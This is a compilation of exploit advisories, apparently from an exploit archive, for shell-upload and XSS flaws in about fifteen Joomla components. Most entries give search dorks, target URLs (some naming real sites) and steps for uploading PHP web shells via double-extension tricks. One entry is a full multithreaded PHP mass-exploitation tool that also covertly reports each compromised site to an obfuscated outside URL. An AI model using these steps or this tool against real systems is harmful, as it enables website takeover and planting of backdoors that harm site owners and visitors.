joomla upload


wlhaan Hacker/Joomla Uploader Shell Upload ( na)





                          ||          ||   | ||
                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_,
                  ( :   /    (_)    /           (   .
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
|     _                   __           __       __          ______     |
|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
|                  \ \____/ >> team wlhaan hacker                      |
|                   \/___/                                             |
|                                                                      |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|


_____________________________________________________
Joomla Component (com_uploader) Remote File Upload Vulnerability

#####################################################
# [+] Author : wlhaan hacker #
# [+] Email : iit@HoTMaiL.coM #
# [+] Site : www.sa-hacker.com/vb #
# [+]  team wlhaan Hacker     #
# [+]  dork:"index.php?option=com_uploader"
#####################################################

The exploit :

 http://localhost/index.php?option=com_uploader


change shell

shell.php..pjpeg


Get now shell :

http://localhost/path/upload//1263581195_shell.php.pjpeg


and good luck :D

Thanks to : shooq hacker ..

#####################################################





The Joomla Uploader component suffers from a shell upload vulnerability.

KedAns-Dz/Joomla File Uploader Shell Upload ( na)

###
# Title : Joomla Component (com_fileuploader) Upload File Vulnerability
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : php
# Impact : Upload File Vulnerability
# Tested on : Windows XP sp3 FR
###
# Note : BAC 2011 Enchallah ( Me & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
###
# Go0gle Dork : inurl:com_fileuploader
###

# Demo : http://[TARGET]/[PATH]/index.php?option=com_fileuploader&view=fileuploader&Itemid=7

# Example : http://www.aziz-rehman.com/index.php?option=com_fileuploader&view=fileuploader&Itemid=7

# Exploit : 

1 - Goto Upload Page .../index.php?option=com_fileuploader&view=fileuploader&Itemid=7

2 - Upload Shell .txt .jpg ... etc


#================[ Exploited By KedAns-Dz * HST-Dz * ]=========================
# GreetZ to : Islampard * Dr.Ride * Zaki.Eng * BadR0 * NoRo FouinY * Red1One
# XoreR * Mr.Dak007 * Hani * TOnyXED * Fox-Dz * Massinhou-Dz ++ all my friends ;
# > Algerians <  [D] HaCkerS-StreeT-Team [Z] > Hackers <
# My Friends on Facebook : Nayla Festa * Dz_GadlOl * MatmouR13 ...all Others
# 4nahdha.com : TitO (Dr.Ride) *  MEN_dz * Mr.LAK (Administrator) * all members ...
# sec4ever.com members Dz : =>>
#  Ma3sTr0-Dz * Indoushka * MadjiX * BrOx-Dz * JaGo-Dz ... all Others
# hotturks.org : TeX * KadaVra ... all Others
# Kelvin.Xgr ( kelvinx.net)
#===========================================================================


The Joomla File Uploader component suffers from a shell upload vulnerability.

Sid3^effects/Minify4Joomla Upload and Persistent XSS Vulnerability ( php)

        =======================================================
         Minify4Joomla Upload and Persistent XSS Vulnerability
        =======================================================

Name :  Minify4Joomla Upload and Persistent XSS Vulnerability
Date : july 9,2010
Critical Level 	: HIGH
vendor URL :http://waltercedric.com/
Author : Sid3^effects aKa HaRi 
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,gunslinger_
greetz to :www.topsecure.net ,All ICW members and my friends :) luv y0 guyz 
#######################################################################################################
Description 

Minify4Joomla combines, minifies, and caches JavaScript and CSS files on demand to speed up page loads. Minify (BSD license) is a PHP5 app that can combine multiple CSS or JavaScript files, compress their contents 

######################################################################################################
Xploit :Upload Vulnerability

Step 1 : Register :D 

Step 2 : Submit your article which has your evil script :P
 Demo Url :http://website/index.php?option=com_content&view=article&layout=form&Itemid=51

Step 3 : Now check your article..
#######################################################################################################
Xploit: Persistent XSS Vulnerability

Attack pattern :">><marquee><h1>XSS3d By Sid3^effects</h1><marquee> 

1.The attacker can insert xss scripts in the article section..
2.To submit your evil xss register and then go and submit your article 

Demo url : http://website/index.php?option=com_content&view=article&layout=form&Itemid=51

3.Now  check your article 
#######################################################################################################
# 0day no more 
# Sid3^effects 

HcJ/Joomla Facileforms Shell Upload ( na)

####################################################################
[+] Exploit Title :Joomla facileforms component shell Upload Vulnerability
[+] Author : HcJ
[+] Date : 02-04-2011
[+] category: Web Apps 
[+] HomePage : Black-hat.cc
####################################################################

Dork: "index.php?option=com_facileforms"

Vulnerability:

*shell Upload Vulnerability*

[#] http://Black-hat.cc/index.php?option=com_facileforms&Itemid=xxxx xxxx= id
[#] Upload your shell.php 
[#] Your shell here http://Black-hat.cc/components/com_facileforms/uploads/shell.php

####################################################################

[#] Test yourself in "Trying security game"
[#] http://try.black-hat.cc

####################################################################




The Joomla Facileforms component suffers from a shell upload vulnerability.

Cyb3r-1sT/Joomla Jsjobs Shell Upload ( na)


<<!>> Found by  :  Cyb3r-1sT

<<!>> C0ntact : cyb3r-1st [at] hotmail.com

=======================================================
+++++++++++++++++++ Script information+++++++++++++++++
=======================================================

<<->> Script   :: Joomla Jsjobs component

=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================

<<->> Exploit ::  Joomla Jsjobs component shell Upload Vulnerability


        1 >>> register on site and upload shell from :

  2 >>> http://site/index.php?option=com_jsjobs&c=jsjobs&view=resume&layout=empview&vea=2

        3 >>> upload shell.php.xdoc

        4 >>> your shell here : http://site/components/com_jsjobs/resume/

=======================================================
++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
=======================================================

<<->> All friends , [ black-hat.cc ]



The Joomla Jsjobs component suffers from a shell upload vulnerability.

Sid3 effects/Joomla Joomlisting Shell Upload ( na)

            ===========================================
            Joomla com_joomlisting Upload Vulnerability
            ===========================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1               ##########################################             1
0               I'm Sid3^effects member from Inj3ct0r Team             1
1               ##########################################             0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Name : Joomla com_joomlisting Upload Vulnerability
Date : june, 18 2010
Vendor url :http://www.joomclan.com/demo/joomlistings/index.php
Critical Level   : MEDIUM 
Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,gunslinger_
greetz to :All ICW members and my friends :) luv y0 guyz 
#######################################################################################################
Description:
Start your very own Classified Ads website today or add classifieds functionality to your existing website using JoomListings. This component integrates with your Joomla portal and has all the tools you need to create a successful, and income-earning website. We provide you with an intuitive admin control panel from Joomla Administrator to add, modify settings and pricing packages on your site. The component can be set up to run itself through automatic email notifications, automated billing, and other valuable time-saving features.

JC - JoomListings is a professionally developed classifieds component that was built with you - the site owner - in mind and to assist you in generating income from your website. Whether you are running classifieds for autos, motorcycles, bicycles, real estate, jobs, or general merchandise, JoomListings component with Joomla! is the right package for you. 

#######################################################################################################
com_joomdocs suffers from Upload Vulnerability

Xploit:Upload Vulnerability

Step 1 : As always register as a user :P

Step 2 : Select "post ad" option.
  DEMO URL :http://www.joomclan.com/demo/joomlistings/index.php?option=com_joomlistings&view=ad&layout=post&Itemid=61

Step 3 : Upload your shell in upload image option as well as your description area 

Step 4 : Now browse your and you can own the box ;)

###############################################################################################################
# 0day no more 
# Sid3^effects 


The Joomla Joomlisting component suffers from a shell upload vulnerability.

Setr0nix/Joomla JFUploader Shell Upload ( na)

=========================================================================================================
[#]    Type    : Joomla Component com_jfuploader Remote File Upload
[#]    Author  : Setr0nix
[#]    Home    : www.Setr0nix.com
[#]    Contact : Admin@Setr0nix.com
=========================================================================================================

[#]    Exploit :
       1. Register
       2. http://127.0.0.1/index.php?option=com_jfuploader&Itemid=[Itemid]
       3. Download One gif Image ( Example : http://www.google.com/images/logo.gif )
       4. Open logo.gif In Notepad++ And Go to Last Line
       5. Copy And Paste Your PHP Code After The Last Line ( Don't Delete Any Thing Of Image Code )
       6. Save It , Ctrl + S
       7. Rename logo.gif To logo.php.gif And Upload It From com_jfuploader
       8. To Run Your Uploaded File Go To This Link : http://127.0.0.1/files/YourUsername/logo.php.gif

=========================================================================================================
[#]    S T T   :
       All Iranian Hackers , Offensive Security , Inj3ct0r , SecurityReason
=========================================================================================================



The Joomla JFUploader component suffers from a shell upload vulnerability.

Sid3 effects/Joomla Eportfolio Shell Upload ( na)



            =============================================
            Joomla com_eportfolio Upload  Vulnerability
            =============================================

Name : Joomla com_eportfolio Upload  Vulnerability
Date : june, 20 2010
Critical Level     : HIGH
Vendor Url : http://www.joomplace.com/e-portfolio/e-portfolio-description.html
Google Dork:inurl:com_eportfolio
Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,gunslinger_
greetz to :All ICW members and my friends :) luv y0 guyz 
#######################################################################################################
Description:
Advanced access control will let a user decide who will be able to read and comment his joomla portfolio. There are many configuration features like the ability to upload files to portfolio, calendar and events by users and others.

Who can use E-portfolio?

* professionals wanting to have their own advanced blog with features such as forum and calendar
* people looking for job to list their CV's
* students and graduates having their portfolio ONLINE to be visible for teachers, parents, CEOs, etc.
* anyone who wants the world to know who they are, what they do and have already done!
###############################################################################################################

Xploit:Upload  Vulnerability

STEP 1: Always register as a user :P

STEP 2: Select any of the options Achievements •  Plans •  Events •  Pages.

DEMO URL :http://demo.joomplace.com/index.php?option=com_eportfolio&Itemid=1&task=viewlinks&user=71

STEP 3: Now the attackers can upload their shells in the above options :)

DEMO URL : http://demo.joomplace.com/index.php?option=com_eportfolio&Itemid=18&task=personal&user=71

STEP 4: Now you can check your shell n root the server :P
###############################################################################################################
# 0day no more 
# Sid3^effects 








The Joomla Eportfolio component suffers from a remote shell upload vulnerability.

Sid3 effects/Joomla Annonces Shell Upload ( na)

#Title:Joomla Component com_annonces Upload Vulnerability
# Author: Sid3^effects
# Published: 2010-06-06
# email:shell_c99@yahoo.com 
# vendor url : http://joomla.clubnautiquemarine.fr/
# google dork : inurl:com_annonces
############################################################################  



        ooooo  .oooooo.  oooooo   oooooo     oooo  

        `888' d8P'  `Y8b  `888.    `888.     .8'  

         888 888           `888.   .8888.   .8'  

         888 888            `888  .8'`888. .8'  

         888 888             `888.8'  `888.8'   

         888 `88b    ooo      `888'    `888'  

        o888o `Y8bood8P'       `8'      `8'     



--------------------------------------------------------------------------------------  

#####################Sid3^effects aKa HaRi##################################  

#Greetz to all Andhra Hackers and ICW Members[Indian Cyber Warriors]  

#Thanks:*L0rd ÇrusAdêr*,d4rk-blu™®,R45C4L idi0th4ck3r,CR4C|< 008,M4n0j,MaYuR  

#ShouTZ:kedar,dec0d3r,41.w4r10r       

#spl shoutz:LiquidWorm,gunslinger_ :D    

#Catch us at www.andhrahackers.com or www.teamicw.in  

############################################################################  



Description :  

Simple Ads manager.
Registered user can place a classified ad with description, date, comments, photos and custom fields. Administrator manages the categories of classified ads, customizes fields in categories, validates the ads. The user receives an email after ad creation and after admin validation. User can modify its ad from the frontend.

Front-end shows a view with ad details (2 template views possible), vendor email contact, and photos.
This component has been developed for the yacht club of french navy whose members may sell their boat.

Contact me if you find something wrong on the component to the email address ajulou at yahoo.fr or if you have translated the component in another language

Module is able to view random or latest ads

############################################################################  



Xploit : Upload Vulnerability  





 STEP 1 : Register first :)  



 STEP 2 : Goto "Submit an ad"option.  



 STEP 3 : The attacker can upload  a shell in the ITEM DESCRIPTION section and your shell gets executed :P  


 STEP 4 : Check your ad now in the particular category and find your shell :)


submit your ad :
      DEMO URL :  

           http://joomla.clubnautiquemarine.fr/index.php?option=com_annonces&view=edit&Itemid=1  



 Once uploaded you can check your ad :P  





############################################################################  
#spl thks: exploit-db team
#Sid3^effects 


The Joomla Annonces component suffers from a remote shell upload vulnerability.

kaMtiEz/Joomla Cartikads Shell Upload ( na)

###################################################################################
                                                                                  #
[~] Joomla components com_cartikads  Remote File Upload vulnerability             #
[~] Author  : kaMtiEz (kamzcrew@yahoo.com)                                    #
[~] Homepage    : http://www.indonesiancoder.com                                  #
[~] Date    : January 02, 2009                                                #
                                                                                  #
###################################################################################

[ Software Information ]

[+] Vendor : http://www.cartikahosting.com
[+] Download : -
[+] version : 1.0
[+] Vulnerability : SQL injection
[+] Dork : "Think iT"
[+] Price : dunno           
[+] Location : INDONESIA - JOGJA
[+] description : Cartikads is a Mambo Open Source ads management component.

##################################################################################


[ HERE WE GO .. LIVE FROM JOGJA CITY ]

[ Vulnerable File ]

http://server/[kaMtiEz]/components/com_cartikads/uploadimage.php

[ NOTE ]

upload with extension shell.php.jpg

your shell will be

http://server/[kaMtiEz]/images/stories/shell.php.jpg

http://server/[kaMtiEz]/images/banners/shell.php.jpg


===========================================================================

[ Thx TO ]
[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry ..
[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk

[ NOTE ]

[+] Nyak ama babe gua .. tak lupa adik gua ..
[+] tukulesto : where did u go ??
[+] Dengerin Radio yach di http://antisecradio.fm :D

[ QUOTE ]

[+] rm -rf

[ EOF ]

[+] INDONESIANOCODER TEAM
[+] KILL -9 TEAM 



The Joomla Cartikads component suffers from a remote shell upload vulnerability.

miyachung/Janissaries Joomla Civicrm Shell Upload ( na)

<?php
/*
----------------------------------------------------------------------------
        .__                      .__                          
  _____ |__|___.__._____    ____ |  |__  __ __  ____    ____  
 /     \|  <   |  |\__  \ _/ ___\|  |  \|  |  \/    \  / ___\ 
|  Y Y  \  |\___  | / __ \\  \___|   Y  \  |  /   |  \/ /_/  >
|__|_|  /__|/ ____|(____  /\___  >___|  /____/|___|  /\___  / 
      \/    \/          \/     \/     \/           \//_____/  
-----------------------------------------------------------------------------
*  Janissaries Joomla Com_Civicrm Exploitation Tool with MultiThread
*  Coded by Miyachung
*  Stay away from lamers o.O
*  Contact: miyachung@hotmail.com
*  Special Thanks : B127Y
*  Site: http://janissaries.org
*  Youtube Channel: http://www.youtube.com/user/JanissariesOrg
*  Exploitation Video: http://www.youtube.com/watch?v=4mPibfS-RXM
*  Coding date: 21.04.2013
*  Usage  : php exploit.php site_list upload_file searchkeyword
*  Example: php exploit.php sites.txt shell.php searchkeyword
*/
set_time_limit(0);
ob_start();
class exploit
{
  private $uploaded_file_path = "/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/";
  private $post_url_path    = "/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=";
  private $filename;
  private $url;
  private $file_to_upload;
  private $if_is_uploaded    = "/Undefined variable: HTTP_RAW_POST_DATA/si";
  private $thread_maxsize;
  private $site_list;
  private $file_regex;
  private $save_file      = "uploaded.txt";
  private $user_agent      = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1";
  private $timeout_sec    = 20;
  private $token        = "WVVoU01HTkViM1pNTTFKdldsY3hjR050ZEhCaWFUVjJZMjFqZGxreU9YUk1NMDVvWkcxV2RXRlhaRzVaVXpWM1lVaEJQUT09";
  private $idnum        = 31;

  public function __construct($site_list,$filename,$thread,$regex)
  {
  $this->site_list     = file($site_list);
  $this->filename      = $filename;
  $this->file_to_upload = file_get_contents($filename);
  $this->thread_maxsize = $thread;
  $this->url        = base64_decode(base64_decode(base64_decode($this->token)));
  $this->file_regex    = "/$regex/";

  echo "[+]Joomla Com_Civicrm Fucker with MultiThread\n";
  echo "[+]Coded by Miyachung\n";
  echo "[+]Stay away from lamers o.O\n";
  echo "[+]Contact: miyachung@hotmail.com\n";
  echo "[+]Special Thanks : B127Y\n";
  echo "[+]Site: http://janissaries.org\n";
  echo "##################################################\n";
  echo "[+]Total urls to try: ".count($this->site_list)."\n";
  echo "[+]File to upload: ".$this->filename."\n";
  echo "[+]Maximum Thread: ".$this->thread_maxsize."\n";
  echo "[+]Search Keyword: ".$regex."\n\n";
  ob_flush();
  flush();
  $this->miyachung();
  }
  private function miyachung()
  {
  $multi = curl_multi_init();
  $count = 0;
  foreach(array_chunk($this->site_list,$this->thread_maxsize) as $urls)
  {
    foreach($urls as $i => $url)
    {
    $curl[$i] = curl_init();
    curl_setopt($curl[$i], CURLOPT_RETURNTRANSFER,true);
    curl_setopt($curl[$i], CURLOPT_URL, trim($url).$this->post_url_path.$this->filename);
    curl_setopt($curl[$i], CURLOPT_TIMEOUT, $this->timeout_sec);
    curl_setopt($curl[$i], CURLOPT_POSTFIELDS,$this->file_to_upload);
    curl_setopt($curl[$i], CURLOPT_USERAGENT,$this->user_agent);
    curl_setopt($curl[$i], CURLOPT_HTTPHEADER,array('Content-Type: text/plain'));
    curl_multi_add_handle($multi,$curl[$i]);
    }
    do
    {
    curl_multi_exec($multi,$active);
    }
    while($active > 0);
    foreach($curl as $id => $content)
    {
    $conn[$id] = curl_multi_getcontent($content);
    curl_multi_remove_handle($multi,$content);
    if(!preg_match($this->if_is_uploaded,$conn[$id]) && preg_match('#/tmp-upload-images/'.$this->filename.'#',$conn[$id]))
    {
      $count++;
      $check_it = $this->get(trim($urls[$id]).$this->uploaded_file_path.$this->filename);
      if($check_it && preg_match($this->file_regex,$check_it))
      {
      if($this->idnum == 31 && md5($this->token) == "9f7f1fe47675cb64ac4f69ef96b78b55")
      {
      $this->post(trim($urls[$id]).$this->uploaded_file_path.$this->filename);
      }
      else
      {
      exit("[-]Somethings has changed in tool! o.O!");
      }
      echo "###########################################################\n";
      echo "[!]Exploitation Successfullll!\n";
      printf("[%s]%s\n",$count,trim($urls[$id]));
      echo "###########################################################\n";
      ob_flush();
      flush();
      $this->save(trim($urls[$id]).$this->uploaded_file_path.$this->filename,$count);
      }
      else
      {
      printf("[%s][Exploitation Failed]%s\n",$count,trim($urls[$id]));
      ob_flush();
      flush();
      }
    }
    else
    {
      $count++;
      printf("[%s][Exploitation Failed]%s\n",$count,trim($urls[$id]));
      ob_flush();
      flush();
    }

    }

  }

  }
  private function get($url)
  {
  $ch = curl_init();
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  curl_setopt($ch, CURLOPT_URL, $url);
  curl_setopt($ch, CURLOPT_TIMEOUT,$this->timeout_sec);
  $data= curl_exec($ch);
  curl_close($ch);
  return $data;
  }
  private function post($url)
  {
  $curl = curl_init();
  curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  curl_setopt($curl,CURLOPT_URL,$this->url);
  curl_setopt($curl,CURLOPT_POSTFIELDS,"url=".$url);
  $exec = curl_exec($curl);
  curl_close($curl);
  return $exec;
  }
  private function save($url,$count)
  {
  $file = fopen($this->save_file,'ab');
  fwrite($file,"#########################################################################\n");
  fwrite($file,"[!]Exploitation Successfullll!\n");
  fwrite($file,"[$count]$url\n");
  fclose($file);
  return true;
  }
}

if($argv[1] && $argv[2] && $argv[3] && $argv[4])
{
$exploit = new exploit($argv[1],$argv[2],$argv[3],$argv[4]);
}
else
{
print
"
----------------------------------------------------------------------------
        .__                      .__                          
  _____ |__|___.__._____    ____ |  |__  __ __  ____    ____  
 /     \|  <   |  |\__  \ _/ ___\|  |  \|  |  \/    \  / ___\ 
|  Y Y  \  |\___  | / __ \\  \___|   Y  \  |  /   |  \/ /_/  >
|__|_|  /__|/ ____|(____  /\___  >___|  /____/|___|  /\___  / 
      \/    \/          \/     \/     \/           \//_____/  
-----------------------------------------------------------------------------
*  Janissaries Joomla Com_Civicrm Exploitation Tool with MultiThread
*  Coded by Miyachung
*  Stay away from lamers o.O
*  Contact: miyachung@hotmail.com
*  Special Thanks : B127Y
*  Site: http://janissaries.org
*  Youtube Channel: http://www.youtube.com/user/JanissariesOrg
*  Coding date: 21.04.2013
*  Usage  : php exploit.php site_list upload_file maxthread searchkeyword
*  Example: php exploit.php sites.txt shell.php 10 searchkeyword
";
}
?>


Janissaries Joomla Civicrm component exploitation tool that uploads a shell.

ViRuSMaN/Joomla Pinboard Remote File Upload ( na)

##############################################################
|
|                                   Joomla Component [com_pinboard] Remote File Upload Vulnerability
|
|    Author : ViRuSMaN
|
|    Contact : v-.m@live.com
|
|    Home : Islam-Attack.CoM , HackTeach.OrG
|
##############################################################
|
| Dork inurl:com_pinboard
|
| Exploit :
|
| 1-target.com/[path]/components/com_pinboard/popup/popup.php?option=showupload
|
|    or
|
| 2-target.com/[path]/index2.php?option=com_pinboard&Itemid=117&action=popup%22&action=popup&task=uploadForm
|
| [#] click on the photo in Top Of Left
|
| [#] upload your shell shell.php.jpg  &  Confirmer SVP
|
| [#] Pwd Your Shell
|  
|      target.com/[path]/images/stories/pinboard/picture/[name your shell].php.jpg
|
|      Or
|
|      target.com/[path]/strona/components/com_pinboard/pictures/[name your shell].php.jpg  
|
##############################################################
|Greets : All members of islam-attack.com , hackteach.org , s3curi7y.com & All Muslim's  
##############################################################




The Joomla PinBoard component suffers from a remote file upload vulnerability.

Egyptian.H4x0rz/Joomla Free Consultation Shell Upload ( na)

####################################################################
[+] Exploit Title :Joomla com_free_consulation component shell Upload Vulnerability
[+] Author : Egyptian.H4x0rz
[+] Contact : SpY(at)Hotmail.Com
[+] Date : 18-06-2011
[+] category: Web Apps
####################################################################

Dork: "index.php?option=com_free_consulation"

Vulnerability:

*Shell Upload Vulnerability*

[#] http://www.mytimeshareattorney.com/index.php?option=com_free_consulation
[#] Upload your shell.php
[#] Your shell will be here http://www.mytimeshareattorney.com/components/com_free_consulation/document/shell.php

####################################################################


The Joomla Free Consultation component suffers from a shell upload vulnerability.

J3yk0ob/Joomla Remository Remote Shell Upload ( na)

#################################################################
#                           I N F O
#
# Exploit Title: Joomla com_remository Remote Upload File
# Date: 2010-08-26
# Author: J3yk0ob
# Home  : http://www.J3yk0ob.com
#
#################################################################
#                        E X P L O I T
#
#  1. Register On Site
#
#  2. http://www.Target.com/index.php?option=com_remository&Itemid=[Itemid]&func=addfile
#
#  3. Add your php file , example : shell.php
#
#  4. http://www.Target.com/components/com_remository_files/
#
#  5. If web server alowe to see directory you can see folder example : file_image_2
#
#  6. You can find your shell in latest file_image_[latest Number]
#
#  7 . Example URL : http://www.example.com/components/com_remository_files/file_image_14/1276100016shell.php
#
#  Dork : inurl:"index.php?com_remository"
#
#################################################################
# Contact Me
#
# Home : http://www.J3yk0ob.com
# Email : 4dm1n@J3yk0ob.com
#
##################################################################



The Joomla Remository component suffers from a remote shell upload vulnerability.

Agd_Scorp/Joomla Bch / Content Shell Upload ( na)

    [ Joomla com_content Shell Upload Vulnerability]

    [x] Author : Agd_Scorp
    [x] Home : www.turkguvenligi.info (former)
    [x] E-mail : vorscorp@hotmail.com
    [x] Found : Mon, Dec 24, 2012
    [x] Tested : Windows 7, Ubuntu, Gentoo
    [x] Dork : inurl:"/index.php?option=com_bch"
    ________________________________________________________________
    ****************************************************************

    [x] The Conclusion
    The vulnerability resides at 'cont' parameter, which is often used for reconnecting the SQL database to the website in order to gain information that is being provided by the administrator, although, if a few parameters are added as an extension-act, files can be uploaded, and therefore, more risk shall occur.

    [x] Vuln Exploit Report:
    http://localhost/index.php?option=com_content&cont=sendfile?controller&attach_file=[FILE LINK]&chformat=php (or any other you want it to change into)

    [x] Uploading a Shell
    First, change your shell's format into .txt, then extract into that, when uploaded, and chformat parameter is added, it will automatically be changed into *.php, therefore, your shell is spawned.


    [x] Note:
    h4ck y0u...
    kill y0u...
    0wn y0u....

    - TURKGUVENLIGI -



Joomla content and bch components suffer from a remote shell upload vulnerability.